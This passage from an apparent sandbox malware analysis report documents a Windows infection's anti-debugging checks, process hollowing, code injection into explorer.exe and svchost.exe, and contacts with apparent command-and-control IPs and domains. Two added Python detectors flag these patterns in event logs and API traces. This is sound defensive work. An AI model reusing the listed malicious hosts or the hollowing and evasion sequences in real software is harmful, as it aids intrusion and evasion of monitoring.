                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006314D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00636090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | System information queried: ModuleInformation

                          Anti Debugging:

                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\adijaeg | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_004358C0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00560042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | Code function: 12_2_00580083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | Code function: 12_2_0059092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | Code function: 12_2_00590D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Code function: 13_2_00560042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00631250 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_0063C3D0 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00861F83 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Code function: 35_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Code function: 35_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Code function: 35_2_008AE320 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\adijaeg | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Process queried: DebugPort
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_0042BCD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_0042CB92 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00419C9A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Code function: 16_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Memory protected: page guard
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_0043ABA0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00422C80 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00428530 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | Code function: 12_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe | Code function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Code function: 35_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
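The lines above show two processes that never initiate Internet traffic on their own, explorer.exe and a 32-bit (SysWOW64) svchost.exe, connecting to raw addresses on ports 187, 144 and 25 and resolving file-sharing and throwaway domains after code was injected into them. The Python below, added here as an example and not part of the Joe Sandbox report, turns that reasoning into rules over Sysmon-style NetworkConnect/DnsQuery records. The port and domain baselines are assumptions to tune per environment, the process IDs are made up, and the event list is constructed from the report's findings plus a few benign records so the negative cases are visible too.

```python
"""Triage network events from Windows system processes the way the report's
"System process connects to network" signature does.

Added example, not Joe Sandbox code. NetEvent mimics the fields of a Sysmon
NetworkConnect/DnsQuery record; the port and domain baselines are starting points
to tune, and EVENTS is constructed from the report's findings plus benign records.
"""
import ipaddress
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class NetEvent:
    image: str          # full image path of the connecting process
    pid: int            # constructed process id
    dst_ip: str = ""    # empty for DNS-only events
    dst_port: int = 0
    query: str = ""     # queried name for DNS events


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    severity: str
    rule: str
    detail: str


SYSTEM_IMAGES = {"explorer.exe", "svchost.exe"}
EXPECTED_SVCHOST_DIR = r"c:\windows\system32"
# Ports these images are routinely seen on (assumption: tune from your own telemetry,
# this is a baseline for the unusual-port rule, not a list of safe ports).
BASELINE_PORTS = {
    "svchost.exe": {53, 80, 88, 123, 135, 389, 443, 445},
    "explorer.exe": {80, 443, 445},
}
# Name suffixes Windows components resolve on their own (assumption, extend as needed).
BASELINE_DNS_SUFFIXES = ("microsoft.com", "windows.com", "windowsupdate.com", "msftconnecttest.com")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_public(ip: str) -> bool:
    """Globally routable address; private, loopback, link-local and documentation ranges are not."""
    return ipaddress.ip_address(ip).is_global


def under_baseline(name: str) -> bool:
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in BASELINE_DNS_SUFFIXES)


def check(ev: NetEvent) -> List[Finding]:
    """Apply every rule to one event; rules are independent, so one event can yield several findings."""
    name = image_name(ev.image)
    if name not in SYSTEM_IMAGES:
        return []
    directory = ev.image.lower().rsplit("\\", 1)[0]
    out: List[Finding] = []

    def hit(sev: str, rule: str, detail: str) -> None:
        out.append(Finding(ev.pid, ev.image, sev, rule, detail))

    # 1. svchost.exe outside System32: on a 64-bit host the SysWOW64 copy hosts almost nothing,
    #    and in this report it is the process Tofsee's service injected into.
    if name == "svchost.exe" and directory != EXPECTED_SVCHOST_DIR:
        hit("high", "svchost_path", f"svchost.exe running from {directory}")
    if ev.dst_ip:
        public = is_public(ev.dst_ip)
        # 2. Neither image is a mail client; SMTP from them is spam-bot behaviour.
        if ev.dst_port == 25:
            hit("high", "smtp_from_system_process", f"SMTP to {ev.dst_ip}")
        # 3. Public destination on a port outside the image's baseline (187/tcp and 144/tcp above).
        if public and ev.dst_port not in BASELINE_PORTS[name]:
            hit("high", "unusual_port", f"{ev.dst_ip}:{ev.dst_port}")
        # 4. explorer.exe has no business on the Internet at all; downloads belong to browsers
        #    and updaters, so even 80/443 deserves a look.
        if public and name == "explorer.exe":
            hit("medium", "explorer_internet", f"{ev.dst_ip}:{ev.dst_port}")
    # 5. explorer.exe resolving names outside the Windows baseline (cdn.discordapp.com, transfer.sh ...).
    if ev.query and name == "explorer.exe" and not under_baseline(ev.query):
        hit("medium", "explorer_dns", ev.query)
    return out


def triage(events) -> List[Finding]:
    return [f for ev in events for f in check(ev)]


# Constructed from the report's "System process connects to network" lines plus benign records.
EVENTS = [
    NetEvent(r"C:\Windows\SysWOW64\svchost.exe", 1000, "94.142.143.116", 443),
    NetEvent(r"C:\Windows\SysWOW64\svchost.exe", 1000, "104.47.54.36", 25),
    NetEvent(r"C:\Windows\explorer.exe", 2000, "188.166.28.199", 80),
    NetEvent(r"C:\Windows\explorer.exe", 2000, "185.233.81.115", 187),
    NetEvent(r"C:\Windows\explorer.exe", 2000, "185.7.214.171", 144),
    NetEvent(r"C:\Windows\explorer.exe", 2000, query="cdn.discordapp.com"),
    NetEvent(r"C:\Windows\explorer.exe", 2000, query="www.msftconnecttest.com"),   # benign
    NetEvent(r"C:\Windows\System32\svchost.exe", 3000, "104.47.54.36", 443),      # benign: 64-bit host process, baseline port
    NetEvent(r"C:\Windows\explorer.exe", 2000, "10.0.0.5", 445),                    # benign: SMB share on the LAN
    NetEvent(r"C:\Program Files\Browser\browser.exe", 4000, "185.233.81.115", 443),  # out of scope (constructed path)
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.severity}] pid {f.pid} {f.image}: {f.rule} ({f.detail})")
```

The svchost_path rule is the sharpest of the five: it fires on the first record for the SysWOW64 host process before any port is considered, which is exactly the process the report later shows receiving a PE image from gaystiqf.exe. The explorer_internet rule is deliberately only medium because a plain 80/443 connection from explorer.exe is not proof on its own; it becomes interesting together with the dropped-file and injection findings in this report.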
                          Benign windows process drops PE files
                          Source: C:\Windows\explorer.exe | File created: CF17.exe.5.dr
                          Maps a DLL or memory area into another process
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\adijaeg | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\adijaeg | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processes
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2360000 protect: page execute and read and write
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Memory written: C:\Users\user\Desktop\sbxGIUIhRd.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Memory written: C:\Users\user\AppData\Local\Temp\95C6.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Memory written: C:\Users\user\AppData\Local\Temp\FA5C.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2360000 value starts with: 4D5A
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Thread created: C:\Windows\explorer.exe EIP: 4DC1930
                          Source: C:\Users\user\AppData\Roaming\adijaeg | Thread created: unknown EIP: 4F81930
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Thread created: unknown EIP: 5C81930
                          Writes to foreign memory regions
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2360000
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2488008
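The evasive API chains in the Malware Analysis System Evasion section (CreateMutex or GetComputerName followed by Sleep, GetUserDefaultLangID or a PEB read followed by ExitProcess, the Enum\SCSI enumeration, the 30-second-plus sleeps), the DebugPort and CodeIntegrityInformation queries in the Anti Debugging section, and the CreateProcessA ... NtUnmapViewOfSection ... WriteProcessMemory ... SetThreadContext ... ResumeThread hollowing chain with its MZ-prefixed foreign writes above are all patterns that can be matched against an API trace. The Python below, an added example rather than Joe Sandbox code, does that for constructed traces: the ordered chains are copied from the report's wording, and single-call checks cover long sleeps, the ProcessDebugPort (7) and SystemCodeIntegrityInformation (103) information classes, Enum\SCSI registry access and cross-process writes that begin with MZ. The Call record, the mutex name, the paths and the addresses in the traces are all constructed.

```python
"""Flag evasion, anti-debugging and process-injection API patterns in a sandbox API trace.

Added example for the report's "Malware Analysis System Evasion", "Anti Debugging" and
injection signatures; not Joe Sandbox code. The Call record, the chain table and the
three traces at the bottom are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Call:
    api: str                          # API name as a hook would log it (A/W suffix allowed)
    args: Tuple = ()                  # the handful of arguments the hook recorded
    pid: int = 0                      # calling process (constructed ids)
    target_pid: Optional[int] = None  # process a handle-based API operated on, if any


# Ordered chains taken from the report's "Evasive API call chain" and injection lines.
# "DecisionNodes" in the report marks a branch on the result; here the later call simply
# has to follow the earlier one within max_gap calls.
CHAINS = {
    "evasion:mutex_then_sleep": ("CreateMutex", "Sleep"),
    "evasion:locale_then_exit": ("GetUserDefaultLangID", "ExitProcess"),
    "evasion:peb_then_exit": ("GetPEB", "ExitProcess"),   # GetPEB: the report's label for an fs:[30h] read
    "evasion:computername_then_sleep": ("GetComputerName", "Sleep"),
    "evasion:modulefilename_then_exit": ("GetModuleFileName", "ExitProcess"),
    "antidebug:isdebuggerpresent_then_terminate": ("IsDebuggerPresent", "TerminateProcess"),
    "injection:process_hollowing": ("CreateProcess", "NtUnmapViewOfSection",
                                    "WriteProcessMemory", "SetThreadContext", "ResumeThread"),
}
LONG_SLEEP_MS = 30_000                   # the report flags accumulated delays of 30 s or more
PROCESS_DEBUG_PORT = 7                   # PROCESSINFOCLASS value behind "Process queried: DebugPort"
SYSTEM_CODE_INTEGRITY_INFORMATION = 103  # SYSTEM_INFORMATION_CLASS behind "CodeIntegrityInformation"


def normalize(api: str) -> str:
    """Drop the ANSI/Unicode suffix so CreateMutexA and CreateMutexW compare equal."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def chain_match(apis, chain, max_gap=8):
    """True if every call in `chain` occurs in order, each within `max_gap` calls of the previous one."""
    def walk(step, lo, hi):
        if step == len(chain):
            return True
        for i in range(lo, min(hi, len(apis))):
            if apis[i] == chain[step] and walk(step + 1, i + 1, i + 2 + max_gap):
                return True
        return False
    return walk(0, 0, len(apis))


def analyze(trace, max_gap=8):
    """Return the sorted list of pattern names found in one process's trace."""
    apis = [normalize(c.api) for c in trace]
    findings = set()
    for name, chain in CHAINS.items():
        if chain_match(apis, chain, max_gap):
            findings.add(name)
    for call, api in zip(trace, apis):
        if api == "Sleep" and call.args and call.args[0] >= LONG_SLEEP_MS:
            findings.add("evasion:long_sleep")
        elif api == "NtQueryInformationProcess" and call.args and call.args[0] == PROCESS_DEBUG_PORT:
            findings.add("antidebug:debugport_query")
        elif api == "NtQuerySystemInformation" and call.args and call.args[0] == SYSTEM_CODE_INTEGRITY_INFORMATION:
            findings.add("antidebug:codeintegrity_query")
        elif api in ("RegOpenKeyEx", "RegEnumKeyEx") and call.args and "\\ENUM\\SCSI" in str(call.args[0]).upper():
            findings.add("evasion:vm_disk_enumeration")   # hypervisor vendor strings live under Enum\SCSI
        elif api in ("WriteProcessMemory", "NtWriteVirtualMemory") and call.target_pid not in (None, call.pid):
            data = call.args[1] if len(call.args) > 1 else b""
            findings.add("injection:pe_written_to_foreign_process" if data[:2] == b"MZ"
                         else "injection:foreign_memory_write")
    return sorted(findings)


# Constructed traces. HOLLOWING_TRACE mirrors the report's CreateProcessA ... ResumeThread chain
# (pid 100 hollows its own suspended child, pid 200); STEALER_TRACE mirrors the CFE8.exe checks.
HOLLOWING_TRACE = [
    Call("VirtualAlloc", pid=100), Call("GetModuleFileNameA", pid=100),
    Call("CreateProcessA", (r"C:\Users\user\Desktop\sample.exe", 0x4), 100),   # 0x4 = CREATE_SUSPENDED
    Call("VirtualFree", pid=100), Call("VirtualAlloc", pid=100),
    Call("GetThreadContext", pid=100, target_pid=200),
    Call("ReadProcessMemory", pid=100, target_pid=200),
    Call("NtUnmapViewOfSection", pid=100, target_pid=200),
    Call("VirtualAllocEx", (0x400000,), 100, 200),
    Call("NtWriteVirtualMemory", (0x400000, b"MZ\x90\x00"), 100, 200),   # PE header lands at the image base
    Call("NtWriteVirtualMemory", (0x401000, b"\x55\x8b\xec"), 100, 200),
    Call("WriteProcessMemory", (0x7ffd0008, b"\x00\x00\x40\x00"), 100, 200),  # constructed PEB->ImageBaseAddress patch
    Call("SetThreadContext", pid=100, target_pid=200), Call("ResumeThread", pid=100, target_pid=200),
    Call("ExitProcess", pid=100),
]
STEALER_TRACE = [
    Call("CreateMutexA", ("Local\\constructed-mutex",), 300), Call("Sleep", (1000,), 300),
    Call("GetComputerNameA", pid=300), Call("Sleep", (200,), 300),
    Call("IsDebuggerPresent", pid=300),
    Call("NtQueryInformationProcess", (PROCESS_DEBUG_PORT,), 300),
    Call("NtQuerySystemInformation", (SYSTEM_CODE_INTEGRITY_INFORMATION,), 300),
    Call("RegOpenKeyExA", (r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI",), 300),
    Call("Sleep", (922337203685477,), 300),   # the FA5C.exe delay value from the report
    Call("GetUserDefaultLangID", pid=300), Call("ExitProcess", pid=300),
]
BENIGN_TRACE = [Call(a, pid=400) for a in
                ("GetModuleHandleA", "GetProcAddress", "CreateFileW", "ReadFile", "CloseHandle", "ExitProcess")]

if __name__ == "__main__":
    for name, trace in (("hollowing", HOLLOWING_TRACE), ("stealer", STEALER_TRACE), ("benign", BENIGN_TRACE)):
        print(f"{name}: {analyze(trace)}")
```

max_gap is what keeps the chain rules honest: CreateMutex followed eventually by Sleep happens in most programs, so the second call has to come within a few calls of the first, which is the same idea as the report's DecisionNodes marker. The hollowing chain is deliberately anchored on NtUnmapViewOfSection and SetThreadContext rather than on the writes alone, since ordinary debuggers and installers also call WriteProcessMemory; the MZ check on a foreign write is a separate, stronger indicator and is reported on its own.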
                          .NET source code references suspicious native API functionsShow sources
                          Source: FA5C.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: 21.0.FA5C.exe.530000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: 21.0.FA5C.exe.530000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: 39.2.FA5C.exe.ab0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: 39.0.FA5C.exe.400000.12.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 39.0.FA5C.exe.ab0000.7.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: 39.0.FA5C.exe.400000.4.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 39.0.FA5C.exe.ab0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                           Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                           Source: C:\Users\user\Desktop\sbxGIUIhRd.exe Process created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                           Source: C:\Users\user\AppData\Roaming\adijaeg Process created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
